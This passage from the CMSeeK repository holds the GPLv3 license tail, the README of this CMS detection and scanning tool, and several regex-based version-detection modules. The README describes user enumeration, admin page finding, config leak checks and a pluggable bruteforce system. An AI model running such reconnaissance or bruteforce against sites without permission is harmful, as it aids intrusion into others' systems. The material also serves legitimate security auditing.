500 | to copy, free of charge and under the terms of this License, through a | |
501 | publicly available network server or other readily accessible means, | |
502 | then you must either (1) cause the Corresponding Source to be so | |
503 | available, or (2) arrange to deprive yourself of the benefit of the | |
504 | patent license for this particular work, or (3) arrange, in a manner | |
505 | consistent with the requirements of this License, to extend the patent | |
506 | license to downstream recipients. "Knowingly relying" means you have | |
507 | actual knowledge that, but for the patent license, your conveying the | |
508 | covered work in a country, or your recipient's use of the covered work | |
509 | in a country, would infringe one or more identifiable patents in that | |
510 | country that you have reason to believe are valid. | |
511 | ||
512 | If, pursuant to or in connection with a single transaction or | |
513 | arrangement, you convey, or propagate by procuring conveyance of, a | |
514 | covered work, and grant a patent license to some of the parties | |
515 | receiving the covered work authorizing them to use, propagate, modify | |
516 | or convey a specific copy of the covered work, then the patent license | |
517 | you grant is automatically extended to all recipients of the covered | |
518 | work and works based on it. | |
519 | ||
520 | A patent license is "discriminatory" if it does not include within | |
521 | the scope of its coverage, prohibits the exercise of, or is | |
522 | conditioned on the non-exercise of one or more of the rights that are | |
523 | specifically granted under this License. You may not convey a covered | |
524 | work if you are a party to an arrangement with a third party that is | |
525 | in the business of distributing software, under which you make payment | |
526 | to the third party based on the extent of your activity of conveying | |
527 | the work, and under which the third party grants, to any of the | |
528 | parties who would receive the covered work from you, a discriminatory | |
529 | patent license (a) in connection with copies of the covered work | |
530 | conveyed by you (or copies made from those copies), or (b) primarily | |
531 | for and in connection with specific products or compilations that | |
532 | contain the covered work, unless you entered into that arrangement, | |
533 | or that patent license was granted, prior to 28 March 2007. | |
534 | ||
535 | Nothing in this License shall be construed as excluding or limiting | |
536 | any implied license or other defenses to infringement that may | |
537 | otherwise be available to you under applicable patent law. | |
538 | ||
539 | 12. No Surrender of Others' Freedom. | |
540 | ||
541 | If conditions are imposed on you (whether by court order, agreement or | |
542 | otherwise) that contradict the conditions of this License, they do not | |
543 | excuse you from the conditions of this License. If you cannot convey a | |
544 | covered work so as to satisfy simultaneously your obligations under this | |
545 | License and any other pertinent obligations, then as a consequence you may | |
546 | not convey it at all. For example, if you agree to terms that obligate you | |
547 | to collect a royalty for further conveying from those to whom you convey | |
548 | the Program, the only way you could satisfy both those terms and this | |
549 | License would be to refrain entirely from conveying the Program. | |
550 | ||
551 | 13. Use with the GNU Affero General Public License. | |
552 | ||
553 | Notwithstanding any other provision of this License, you have | |
554 | permission to link or combine any covered work with a work licensed | |
555 | under version 3 of the GNU Affero General Public License into a single | |
556 | combined work, and to convey the resulting work. The terms of this | |
557 | License will continue to apply to the part which is the covered work, | |
558 | but the special requirements of the GNU Affero General Public License, | |
559 | section 13, concerning interaction through a network will apply to the | |
560 | combination as such. | |
561 | ||
562 | 14. Revised Versions of this License. | |
563 | ||
564 | The Free Software Foundation may publish revised and/or new versions of | |
565 | the GNU General Public License from time to time. Such new versions will | |
566 | be similar in spirit to the present version, but may differ in detail to | |
567 | address new problems or concerns. | |
568 | ||
569 | Each version is given a distinguishing version number. If the | |
570 | Program specifies that a certain numbered version of the GNU General | |
571 | Public License "or any later version" applies to it, you have the | |
572 | option of following the terms and conditions either of that numbered | |
573 | version or of any later version published by the Free Software | |
574 | Foundation. If the Program does not specify a version number of the | |
575 | GNU General Public License, you may choose any version ever published | |
576 | by the Free Software Foundation. | |
577 | ||
578 | If the Program specifies that a proxy can decide which future | |
579 | versions of the GNU General Public License can be used, that proxy's | |
580 | public statement of acceptance of a version permanently authorizes you | |
581 | to choose that version for the Program. | |
582 | ||
583 | Later license versions may give you additional or different | |
584 | permissions. However, no additional obligations are imposed on any | |
585 | author or copyright holder as a result of your choosing to follow a | |
586 | later version. | |
587 | ||
588 | 15. Disclaimer of Warranty. | |
589 | ||
590 | THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY | |
591 | APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT | |
592 | HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY | |
593 | OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, | |
594 | THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR | |
595 | PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM | |
596 | IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF | |
597 | ALL NECESSARY SERVICING, REPAIR OR CORRECTION. | |
598 | ||
599 | 16. Limitation of Liability. | |
600 | ||
601 | IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING | |
602 | WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS | |
603 | THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY | |
604 | GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE | |
605 | USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF | |
606 | DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD | |
607 | PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), | |
608 | EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF | |
609 | SUCH DAMAGES. | |
610 | ||
611 | 17. Interpretation of Sections 15 and 16. | |
612 | ||
613 | If the disclaimer of warranty and limitation of liability provided | |
614 | above cannot be given local legal effect according to their terms, | |
615 | reviewing courts shall apply local law that most closely approximates | |
616 | an absolute waiver of all civil liability in connection with the | |
617 | Program, unless a warranty or assumption of liability accompanies a | |
618 | copy of the Program in return for a fee. | |
619 | ||
620 | END OF TERMS AND CONDITIONS | |
621 | ||
622 | How to Apply These Terms to Your New Programs | |
623 | ||
624 | If you develop a new program, and you want it to be of the greatest | |
625 | possible use to the public, the best way to achieve this is to make it | |
626 | free software which everyone can redistribute and change under these terms. | |
627 | ||
628 | To do so, attach the following notices to the program. It is safest | |
629 | to attach them to the start of each source file to most effectively | |
630 | state the exclusion of warranty; and each file should have at least | |
631 | the "copyright" line and a pointer to where the full notice is found. | |
632 | ||
633 | <one line to give the program's name and a brief idea of what it does.> | |
634 | Copyright (C) <year> <name of author> | |
635 | ||
636 | This program is free software: you can redistribute it and/or modify | |
637 | it under the terms of the GNU General Public License as published by | |
638 | the Free Software Foundation, either version 3 of the License, or | |
639 | (at your option) any later version. | |
640 | ||
641 | This program is distributed in the hope that it will be useful, | |
642 | but WITHOUT ANY WARRANTY; without even the implied warranty of | |
643 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the | |
644 | GNU General Public License for more details. | |
645 | ||
646 | You should have received a copy of the GNU General Public License | |
647 | along with this program. If not, see <https://www.gnu.org/licenses/>. | |
648 | ||
649 | Also add information on how to contact you by electronic and paper mail. | |
650 | ||
651 | If the program does terminal interaction, make it output a short | |
652 | notice like this when it starts in an interactive mode: | |
653 | ||
654 | <program> Copyright (C) <year> <name of author> | |
655 | This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'. | |
656 | This is free software, and you are welcome to redistribute it | |
657 | under certain conditions; type `show c' for details. | |
658 | ||
659 | The hypothetical commands `show w' and `show c' should show the appropriate | |
660 | parts of the General Public License. Of course, your program's commands | |
661 | might be different; for a GUI interface, you would use an "about box". | |
662 | ||
663 | You should also get your employer (if you work as a programmer) or school, | |
664 | if any, to sign a "copyright disclaimer" for the program, if necessary. | |
665 | For more information on this, and how to apply and follow the GNU GPL, see | |
666 | <https://www.gnu.org/licenses/>. | |
667 | ||
668 | The GNU General Public License does not permit incorporating your program | |
669 | into proprietary programs. If your program is a subroutine library, you | |
670 | may consider it more useful to permit linking proprietary applications with | |
671 | the library. If this is what you want to do, use the GNU Lesser General | |
672 | Public License instead of this License. But first, please read | |
673 | <https://www.gnu.org/philosophy/why-not-lgpl.html>. |
0 | <p align='center'> | |
1 | <img src="https://i.imgur.com/5VYs1m2.png" alt="Logo"> <br> | |
2 | <a href="https://github.com/Tuhinshubhra/CMSeeK/releases/tag/v.1.1.3"><img src="https://img.shields.io/badge/Version-1.1.3-brightgreen.svg?style=style=flat-square" alt="version"></a> | |
3 | <a href="https://github.com/Tuhinshubhra/CMSeeK/"><img src="https://img.shields.io/badge/python-3-orange.svg?style=style=flat-square" alt="Python Version"></a> | |
4 | <a href="https://github.com/Tuhinshubhra/CMSeeK/stargazers"><img src="https://img.shields.io/github/stars/Tuhinshubhra/CMSeeK.svg" alt="GitHub stars" /></a> | |
5 | <a href="https://github.com/Tuhinshubhra/CMSeeK/blob/master/LICENSE"><img src="https://img.shields.io/github/license/Tuhinshubhra/CMSeeK.svg" alt="GitHub license" /></a> | |
6 | <a href="https://inventory.rawsec.ml/tools.html#CMSeek"><img src="https://inventory.rawsec.ml/img/badges/Rawsec-inventoried-FF5050_flat.svg" alt="Rawsec's CyberSecurity Inventory" /></a> | |
7 | <a href="https://twitter.com/r3dhax0r"><img src="https://img.shields.io/twitter/url/https/github.com/Tuhinshubhra/CMSeeK.svg?style=social" alt="Twitter" /></a> | |
8 | </p> | |
9 | ||
10 | ## What is a CMS? | |
11 | > A content management system (CMS) manages the creation and modification of digital content. It typically supports multiple users in a collaborative environment. Some noteable examples are: *WordPress, Joomla, Drupal etc*. | |
12 | ||
13 | ## Release History | |
14 | ``` | |
15 | - Version 1.1.3 [25-07-2020] | |
16 | - Version 1.1.2 [19-05-2019] | |
17 | - Version 1.1.1 [01-02-2019] | |
18 | - Version 1.1.0 [28-08-2018] | |
19 | - Version 1.0.9 [21-08-2018] | |
20 | - Version 1.0.8 [14-08-2018] | |
21 | - Version 1.0.7 [07-08-2018] | |
22 | ... | |
23 | ``` | |
24 | [Changelog File](https://github.com/Tuhinshubhra/CMSeeK/blob/master/CHANGELOG) | |
25 | ||
26 | ## Functions Of CMSeek: | |
27 | ||
28 | - Basic CMS Detection of over 170 CMS | |
29 | - Drupal version detection | |
30 | - Advanced Wordpress Scans | |
31 | - Detects Version | |
32 | - User Enumeration | |
33 | - Plugins Enumeration | |
34 | - Theme Enumeration | |
35 | - Detects Users (3 Detection Methods) | |
36 | - Looks for Version Vulnerabilities and much more! | |
37 | - Advanced Joomla Scans | |
38 | - Version detection | |
39 | - Backup files finder | |
40 | - Admin page finder | |
41 | - Core vulnerability detection | |
42 | - Directory listing check | |
43 | - Config leak detection | |
44 | - Various other checks | |
45 | - Modular bruteforce system | |
46 | - Use pre made bruteforce modules or create your own and integrate with it | |
47 | ||
48 | ## Requirements and Compatibility: | |
49 | ||
50 | CMSeeK is built using **python3**, you will need python3 to run this tool and is compitable with **unix based systems** as of now. Windows support will be added later. CMSeeK relies on **git** for auto-update so make sure git is installed. | |
51 | ||
52 | ## Installation and Usage: | |
53 | ||
54 | It is fairly easy to use CMSeeK, just make sure you have python3 and git (just for cloning the repo) installed and use the following commands: | |
55 | ||
56 | - git clone `https://github.com/Tuhinshubhra/CMSeeK` | |
57 | - cd CMSeeK | |
58 | - pip/pip3 install -r requirements.txt | |
59 | ||
60 | For guided scanning: | |
61 | ||
62 | - python3 cmseek.py | |
63 | ||
64 | Else: | |
65 | ||
66 | - python3 cmseek.py -u <target_url> [...] | |
67 | ||
68 | Help menu from the program: | |
69 | ||
70 | ``` | |
71 | USAGE: | |
72 | python3 cmseek.py (for guided scanning) OR | |
73 | python3 cmseek.py [OPTIONS] <Target Specification> | |
74 | ||
75 | SPECIFING TARGET: | |
76 | -u URL, --url URL Target Url | |
77 | -l LIST, --list LIST Path of the file containing list of sites | |
78 | for multi-site scan (comma separated) | |
79 | ||
80 | MANIPULATING SCAN: | |
81 | -i cms, --ignore--cms cms Specify which CMS IDs to skip in order to | |
82 | avoid flase positive. separated by comma "," | |
83 | ||
84 | --strict-cms cms Checks target against a list of provided | |
85 | CMS IDs. separated by comma "," | |
86 | ||
87 | --skip-scanned Skips target if it's CMS was previously detected. | |
88 | ||
89 | RE-DIRECT: | |
90 | --follow-redirect Follows all/any redirect(s) | |
91 | --no-redirect Skips all redirects and tests the input target(s) | |
92 | ||
93 | USER AGENT: | |
94 | -r, --random-agent Use a random user agent | |
95 | --googlebot Use Google bot user agent | |
96 | --user-agent USER_AGENT Specify a custom user agent | |
97 | ||
98 | OUTPUT: | |
99 | -v, --verbose Increase output verbosity | |
100 | ||
101 | VERSION & UPDATING: | |
102 | --update Update CMSeeK (Requires git) | |
103 | --version Show CMSeeK version and exit | |
104 | ||
105 | HELP & MISCELLANEOUS: | |
106 | -h, --help Show this help message and exit | |
107 | --clear-result Delete all the scan result | |
108 | --batch Never ask you to press enter after every site in a list is scanned | |
109 | ||
110 | EXAMPLE USAGE: | |
111 | python3 cmseek.py -u example.com # Scan example.com | |
112 | python3 cmseek.py -l /home/user/target.txt # Scan the sites specified in target.txt (comma separated) | |
113 | python3 cmseek.py -u example.com --user-agent Mozilla 5.0 # Scan example.com using custom user-Agent Mozilla is 5.0 used here | |
114 | python3 cmseek.py -u example.com --random-agent # Scan example.com using a random user-Agent | |
115 | python3 cmseek.py -v -u example.com # enabling verbose output while scanning example.com | |
116 | ||
117 | ``` | |
118 | ||
119 | ## Checking For Update: | |
120 | ||
121 | You can check for update either from the main menu or use `python3 cmseek.py --update` to check for update and apply auto update. | |
122 | ||
123 | P.S: Please make sure you have `git` installed, CMSeeK uses git to apply auto update. | |
124 | ||
125 | ## Detection Methods: | |
126 | ||
127 | CMSeek detects CMS via the following: | |
128 | - HTTP Headers | |
129 | - Generator meta tag | |
130 | - Page source code | |
131 | - robots.txt | |
132 | ||
133 | ## Supported CMSs: | |
134 | ||
135 | CMSeeK currently can detect **170+** CMS. Check the list here: [cmss.py](https://github.com/Tuhinshubhra/CMSeeK/blob/master/cmseekdb/cmss.py) file which is present in the `cmseekdb` directory. | |
136 | All the cmss are stored in the following way: | |
137 | ``` | |
138 | cmsID = { | |
139 | 'name':'Name Of CMS', | |
140 | 'url':'Official URL of the CMS', | |
141 | 'vd':'Version Detection (0 for no, 1 for yes)', | |
142 | 'deeps':'Deep Scan (0 for no 1 for yes)' | |
143 | } | |
144 | ``` | |
145 | ||
146 | ## Scan Result: | |
147 | ||
148 | All of your scan results are stored in a json file named `cms.json`, you can find the logs inside the `Result\<Target Site>` directory, and as of the bruteforce results they're stored in a txt file under the site's result directory as well. | |
149 | ||
150 | Here is an example of the json report log: | |
151 | ||
152 | ![Json Log](https://i.imgur.com/5dA9jQg.png) | |
153 | ||
154 | ## Bruteforce Modules: | |
155 | ||
156 | CMSeek has a modular bruteforce system meaning you can add your custom made bruteforce modules to work with cmseek. A proper documentation for creating modules will be created shortly but in case you already figured out how to (pretty easy once you analyze the pre-made modules) all you need to do is this: | |
157 | ||
158 | 1. Add a comment exactly like this `# <Name Of The CMS> Bruteforce module`. This will help CMSeeK to know the name of the CMS using regex | |
159 | ||
160 | 2. Add another comment `### cmseekbruteforcemodule`, this will help CMSeeK to know it is a module | |
161 | ||
162 | 3. Copy and paste the module in the `brutecms` directory under CMSeeK's directory | |
163 | ||
164 | 4. Open CMSeeK and Rebuild Cache using `R` as the input in the first menu. | |
165 | ||
166 | 5. If everything is done right you'll see something like this (refer to screenshot below) and your module will be listed in bruteforce menu the next time you open CMSeeK. | |
167 | ||
168 | <p align='center'> | |
169 | <img alt="Cache Rebuild Screenshot" width="600px" src="https://i.imgur.com/yhdzTYr.png" /> | |
170 | </p> | |
171 | ||
172 | ## Need More Reasons To Use CMSeeK? | |
173 | ||
174 | If not anything you can always enjoy exiting CMSeeK *(please don't)*, it will bid you goodbye in a random goodbye message in various languages. | |
175 | ||
176 | Also you can try reading comments in the code those are pretty random and weird!!! | |
177 | ||
178 | ## Screenshots: | |
179 | ||
180 | <p align="center"> | |
181 | <img alt="Main Menu" src="https://i.imgur.com/Eij6QvX.png" /> | |
182 | <br><em>Main Menu</em><br> | |
183 | <img alt="Scan Result" src="https://i.imgur.com/u0iyLdB.png" /> | |
184 | <br><em>Scan Result</em><br> | |
185 | <img alt="WordPress Scan Result" src="https://i.imgur.com/cOtCJLj.png" /> | |
186 | <br><em>WordPress Scan Result</em><br> | |
187 | </p> | |
188 | ||
189 | ## Guidelines for opening an issue: | |
190 | ||
191 | Please make sure you have the following info attached when opening a new issue: | |
192 | - Target | |
193 | - Exact copy of error or screenshot of error | |
194 | - Your operating system and python version | |
195 | ||
196 | **Issues without these informations might not be answered!** | |
197 | ||
198 | ## Disclaimer: | |
199 | ||
200 | **Usage of CMSeeK for testing or exploiting websites without prior mutual consistency can be considered as an illegal activity. It is the final user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program.** | |
201 | ||
202 | ## License: | |
203 | ||
204 | CMSeeK is licensed under [GNU General Public License v3.0](https://github.com/Tuhinshubhra/CMSeeK/blob/master/LICENSE) | |
205 | ||
206 | ## Follow Me @r3dhax0r: | |
207 | ||
208 | [Twitter](https://twitter.com/r3dhax0r) ⏎ |
0 | #!/usr/bin/python3 | |
1 | # -*- coding: utf-8 -*- | |
2 | # This is a part of CMSeeK, check the LICENSE file for more information | |
3 | # Copyright (c) 2018 - 2020 Tuhinshubhra | |
4 | ||
5 | # Al Mubda version detection | |
6 | # Rev 1 | |
7 | ||
8 | import cmseekdb.basic as cmseek | |
9 | import re | |
10 | ||
11 | def start(source): | |
12 | cmseek.statement("Detecting Al Mubda version using source code [Method 1 of 1]") | |
13 | regex = re.findall(r'Powered by Al Mubda version (\d.*?)</a>', source) | |
14 | if regex != []: | |
15 | if regex[0] != '' and regex[0] != ' ': | |
16 | version = regex[0] | |
17 | cmseek.success('Al Mubda version ' + cmseek.bold + cmseek.fgreen + version + cmseek.cln + ' detected') | |
18 | return version | |
19 | ||
20 | cmseek.error('Version detection failed!') | |
21 | return '0' |
0 | #!/usr/bin/python3 | |
1 | # -*- coding: utf-8 -*- | |
2 | # This is a part of CMSeeK, check the LICENSE file for more information | |
3 | # Copyright (c) 2018 - 2020 Tuhinshubhra | |
4 | ||
5 | # AEF version detection | |
6 | # Rev 1 | |
7 | ||
8 | import cmseekdb.basic as cmseek | |
9 | import re | |
10 | ||
11 | def start(source): | |
12 | regex = re.findall(r'Powered By AEF (\d.*?)</a>', source) | |
13 | if regex != []: | |
14 | if regex[0] != '' and regex[0] != ' ': | |
15 | version = regex[0] | |
16 | cmseek.success('AEF version ' + cmseek.bold + cmseek.fgreen + version + cmseek.cln + ' detected') | |
17 | return version | |
18 | ||
19 | cmseek.error('Version detection failed!') | |
20 | return '0' |
0 | #!/usr/bin/python3 | |
1 | # -*- coding: utf-8 -*- | |
2 | # This is a part of CMSeeK, check the LICENSE file for more information | |
3 | # Copyright (c) 2018 - 2020 Tuhinshubhra | |
4 | ||
5 | # Amiro.CMS version detection | |
6 | # Rev 1 | |
7 | ||
8 | import cmseekdb.basic as cmseek | |
9 | import re | |
10 | ||
11 | def start(source): | |
12 | cmseek.statement('Detecting Amiro.CMS version using page source [Method 1 of 1]') | |
13 | regex = re.findall(r'_cv=(.*?)("|&|\')', source)[0] | |
14 | if regex != []: | |
15 | if regex[0] != '' and regex[0] != ' ': | |
16 | version = regex[0] | |
17 | cmseek.success('Amiro.CMS version ' + cmseek.bold + cmseek.fgreen + version + cmseek.cln + ' detected') | |
18 | return version | |
19 | ||
20 | cmseek.error('Version detection failed!') | |
21 | return '0'⏎ |
0 | #!/usr/bin/python3 | |
1 | # -*- coding: utf-8 -*- | |
2 | # This is a part of CMSeeK, check the LICENSE file for more information | |
3 | # Copyright (c) 2018 - 2020 Tuhinshubhra | |
4 | ||
5 | # AspNetForum version detection | |
6 | # Rev 1 | |
7 | ||
8 | import cmseekdb.basic as cmseek | |
9 | import re | |
10 | ||
11 | def start(source): | |
12 | regex = re.findall(r'AspNetForum v.(\d.*?)</', source) | |
13 | if regex != []: | |
14 | if regex[0] != '' and regex[0] != ' ': | |
15 | version = regex[0] | |
16 | cmseek.success('AspNetForum version ' + cmseek.bold + cmseek.fgreen + version + cmseek.cln + ' detected') | |
17 | return version | |
18 | ||
19 | cmseek.error('Version detection failed!') | |
20 | return '0' |
0 | #!/usr/bin/python3 | |
1 | # -*- coding: utf-8 -*- | |
2 | # This is a part of CMSeeK, check the LICENSE file for more information | |
3 | # Copyright (c) 2018 Tuhinshubhra | |
4 | ||
5 | # Oracle ATG version detection | |
6 | # Rev 1 | |
7 | ||
8 | import cmseekdb.basic as cmseek | |
9 | import re | |
10 | from base64 import b64decode | |
11 | ||
12 | ||
13 | def start(headers): | |
14 | cmseek.statement('Detecting version using atg_version [Method 1 of 1]') | |
15 | try: | |
16 | encoded_version = re.search('X-ATG-Version: version=(.+)', headers).group(1) | |
17 | version = b64decode(encoded_version).decode('utf-8') | |
18 | version = re.search('ATGPlatform\/([\d\.]+)', version).group(1) | |
19 | except: | |
20 | version = None | |
21 | ||
22 | if version: | |
23 | cmseek.success('Oracle ATG version ' + cmseek.bold + version + cmseek.cln + ' detected') | |
24 | else: | |
25 | cmseek.error('Oracle ATG version detection failed!') | |
26 | version = '0' | |
27 | ||
28 | return version |
0 | #!/usr/bin/python3 | |
1 | # -*- coding: utf-8 -*- | |
2 | # This is a part of CMSeeK, check the LICENSE file for more information | |
3 | # Copyright (c) 2018 - 2020 Tuhinshubhra | |
4 | ||
5 | # Burning Board version detection | |
6 | # Rev 1 | |
7 | ||
8 | import cmseekdb.basic as cmseek | |
9 | import re | |
10 | ||
11 | def start(source): | |
12 | regex = re.findall(r'<strong>Burning Board® (.*?)</strong>', source) | |
13 | if regex != []: | |
14 | if regex[0] != '' and regex[0] != ' ': | |
15 | version = regex[0] | |
16 | cmseek.success('Burning Board version ' + cmseek.bold + cmseek.fgreen + version + cmseek.cln + ' detected') | |
17 | return version | |
18 | ||
19 | cmseek.error('Version detection failed!') | |
20 | return '0' |
0 | #!/usr/bin/python3 | |
1 | # -*- coding: utf-8 -*- | |
2 | # This is a part of CMSeeK, check the LICENSE file for more information | |
3 | # Copyright (c) 2018 - 2020 Tuhinshubhra | |
4 | ||
5 | # Beehive Forum version detection | |
6 | # Rev 1 | |
7 | ||
8 | import cmseekdb.basic as cmseek | |
9 | import re | |
10 | ||
11 | def start(ga_content): | |
12 | regex = re.findall(r'Beehive Forum (.*)', ga_content) | |
13 | if regex != []: | |
14 | version = regex[0] | |
15 | cmseek.success('Beehive Forum version ' + cmseek.bold + cmseek.fgreen + version + cmseek.cln + ' detected') | |
16 | return version | |
17 | else: | |
18 | cmseek.error('Version detection failed!') | |
19 | return '0' |
0 | #!/usr/bin/python3 | |
1 | # -*- coding: utf-8 -*- | |
2 | # This is a part of CMSeeK, check the LICENSE file for more information | |
3 | # Copyright (c) 2018 - 2020 Tuhinshubhra | |
4 | ||
5 | # BrowserCMS version detection | |
6 | # Rev 1 | |
7 | ||
8 | import cmseekdb.basic as cmseek | |
9 | import re | |
10 | ||
11 | def start(ga_content): | |
12 | ga_content = ga_content.lower() | |
13 | regex = re.findall(r'browsercms (.*)', ga_content) | |
14 | if regex != []: | |
15 | version = regex[0] | |
16 | cmseek.success('BrowserCMS version ' + cmseek.bold + cmseek.fgreen + version + cmseek.cln + ' detected') | |
17 | return version | |
18 | else: | |
19 | cmseek.error('Version detection failed!') | |
20 | return '0' |
0 | #!/usr/bin/python3 | |
1 | # -*- coding: utf-8 -*- | |
2 | # This is a part of CMSeeK, check the LICENSE file for more information | |
3 | # Copyright (c) 2018 - 2020 Tuhinshubhra | |
4 | ||
5 | # CMS Contenido version detection | |
6 | # Rev 1 | |
7 | ||
8 | import cmseekdb.basic as cmseek | |
9 | import re | |
10 | ||
11 | def start(ga_content): | |
12 | ga_content = ga_content.lower() | |
13 | regex = re.findall(r'contenido (.*)', ga_content) | |
14 | if regex != []: | |
15 | version = regex[0] | |
16 | cmseek.success('CMS Contenido version ' + cmseek.bold + cmseek.fgreen + version + cmseek.cln + ' detected') | |
17 | return version | |
18 | else: | |
19 | cmseek.error('Version detection failed!') | |
20 | return '0' |
0 | #!/usr/bin/python3 | |
1 | # -*- coding: utf-8 -*- | |
2 | # This is a part of CMSeeK, check the LICENSE file for more information | |
3 | # Copyright (c) 2018 - 2020 Tuhinshubhra | |
4 | ||
5 | # Contensis CMS version detection | |
6 | # Rev 1 | |
7 | ||
8 | import cmseekdb.basic as cmseek | |
9 | import re | |
10 | ||
11 | def start(ga_content): | |
12 | regex = re.findall(r'Contensis CMS Version (.*)', ga_content) | |
13 | if regex != []: | |
14 | version = regex[0] | |
15 | cmseek.success('Contensis CMS version ' + cmseek.bold + cmseek.fgreen + version + cmseek.cln + ' detected') | |
16 | return version | |
17 | else: | |
18 | cmseek.error('Version detection failed!') | |
19 | return '0' |
0 | #!/usr/bin/python3 | |
1 | # -*- coding: utf-8 -*- | |
2 | # This is a part of CMSeeK, check the LICENSE file for more information | |
3 | # Copyright (c) 2018 - 2020 Tuhinshubhra | |
4 | ||
5 | # Commerce Server version detection | |
6 | # Rev 1 | |
7 | ||
8 | import cmseekdb.basic as cmseek | |
9 | import re | |
10 | ||
11 | def start(url, ua): | |
12 | cmseek.statement('Detecting Commerce Server using headers [Method 1 of 1]') | |
13 | kurama = cmseek.getsource(url, ua) | |
14 | header = kurama[2].split('\n') | |
15 | regex = [] | |
16 | for tail in header: | |
17 | if 'commerce-server-software:' in tail.lower(): | |
18 | regex = re.findall(r'commerce-server-software: (.*)', tail, re.IGNORECASE) | |
19 | if regex != [] and regex[0] != "": | |
20 | cmseek.success('Commerce Server version ' + cmseek.bold + cmseek.fgreen + regex[0] + cmseek.cln + ' detected') | |
21 | return regex[0] | |
22 | else: | |
23 | cmseek.error('Version detection failed!') | |
24 | return '0' |
0 | #!/usr/bin/python3 | |
1 | # -*- coding: utf-8 -*- | |
2 | # This is a part of CMSeeK, check the LICENSE file for more information | |
3 | # Copyright (c) 2018 - 2020 Tuhinshubhra | |
4 | ||
5 | # Concrete5 CMS version detection | |
6 | # Rev 1 | |
7 | ||
8 | import cmseekdb.basic as cmseek | |
9 | import re | |
10 | ||
11 | def start(ga_content): | |
12 | regex = re.findall(r'concrete5 - (.*)', ga_content) | |
13 | if regex != []: | |
14 | version = regex[0] | |
15 | cmseek.success('Concrete5 CMS version ' + cmseek.bold + cmseek.fgreen + version + cmseek.cln + ' detected') | |
16 | return version | |
17 | else: | |
18 | cmseek.error('Version detection failed!') | |
19 | return '0' |
0 | #!/usr/bin/python3 | |
1 | # -*- coding: utf-8 -*- | |
2 | # This is a part of CMSeeK, check the LICENSE file for more information | |
3 | # Copyright (c) 2018 - 2020 Tuhinshubhra | |
4 | ||
5 | # CMSimple version detection | |
6 | # Rev 1 | |
7 | ||
8 | import cmseekdb.basic as cmseek | |
9 | import re | |
10 | ||
11 | def start(ga_content): | |
12 | ga_content = ga_content.lower() | |
13 | if 'cmsimple_' in ga_content: | |
14 | regex = re.search(r'cmsimple_(.*?) (.*?) ', ga_content) | |
15 | if regex != []: | |
16 | try: | |
17 | version = regex.group(2) | |
18 | cmseek.success('CMSimple version ' + cmseek.bold + cmseek.fgreen + version + cmseek.cln + ' detected') | |
19 | return version | |
20 | except Exception as e: | |
21 | cmseek.error('Version detection failed!') | |
22 | return '0' | |
23 | else: | |
24 | regex = re.findall(r'cmsimple (.*)', ga_content) | |
25 | if regex != []: | |
26 | version = regex[0] | |
27 | cmseek.success('CMSimple version ' + cmseek.bold + cmseek.fgreen + version + cmseek.cln + ' detected') | |
28 | return version | |
29 | ||
30 | cmseek.error('Version detection failed!') | |
31 | return '0' |
0 | #!/usr/bin/python3 | |
1 | # -*- coding: utf-8 -*- | |
2 | # This is a part of CMSeeK, check the LICENSE file for more information | |
3 | # Copyright (c) 2018 - 2020 Tuhinshubhra | |
4 | ||
5 | def start(id, url, ua, ga, source, ga_content, headers): | |
6 | if id == "wp": | |
7 | # trust me more will be added soon | |
8 | import VersionDetect.wp as wpverdetect | |
9 | wpver = wpverdetect.start(id, url, ua, ga, source) | |
10 | return wpver | |
11 | elif id == 'joom': | |
12 | import VersionDetect.joom as joomverdetect | |
13 | joomver = joomverdetect.start(id, url, ua, ga, source) | |
14 | return joomver | |
15 | elif id == 'dru': | |
16 | import VersionDetect.dru as druverdetect | |
17 | druver = druverdetect.start(id, url, ua, ga, source) | |
18 | return druver | |
19 | elif id == 'xe': | |
20 | import VersionDetect.xe as xeverdetect | |
21 | xever = xeverdetect.start(ga_content) | |
22 | return xever | |
23 | elif id == 'wgui': | |
24 | import VersionDetect.wgui as wguiverdetect | |
25 | wguiver = wguiverdetect.start(ga_content) | |
26 | return wguiver | |
27 | elif id == 'umi': | |
28 | import VersionDetect.umi as umiverdetect | |
29 | umiver = umiverdetect.start(url, ua) | |
30 | return umiver | |
31 | elif id == 'tidw': | |
32 | import VersionDetect.tidw as tidwverdetect | |
33 | tidwver = tidwverdetect.start(source) | |
34 | return tidwver | |
35 | elif id == 'sulu': | |
36 | import VersionDetect.sulu as suluverdetect | |
37 | suluver = suluverdetect.start(url, ua) | |
38 | return suluver | |
39 | elif id == 'subcms': | |
40 | import VersionDetect.subcms as subcmsverdetect | |
41 | subcmsver = subcmsverdetect.start(ga_content) | |
42 | return subcmsver | |
43 | elif id == 'snews': | |
44 | import VersionDetect.snews as snewsverdetect | |
45 | snewsver = snewsverdetect.start(ga_content, source) | |
46 | return snewsver | |
47 | elif id == 'spity': | |
48 | import VersionDetect.spity as spityverdetect | |
49 | spityver = spityverdetect.start(ga_content) | |
50 | return spityver | |
51 | elif id == 'slcms': | |
52 | import VersionDetect.slcms as slcmsverdetect | |
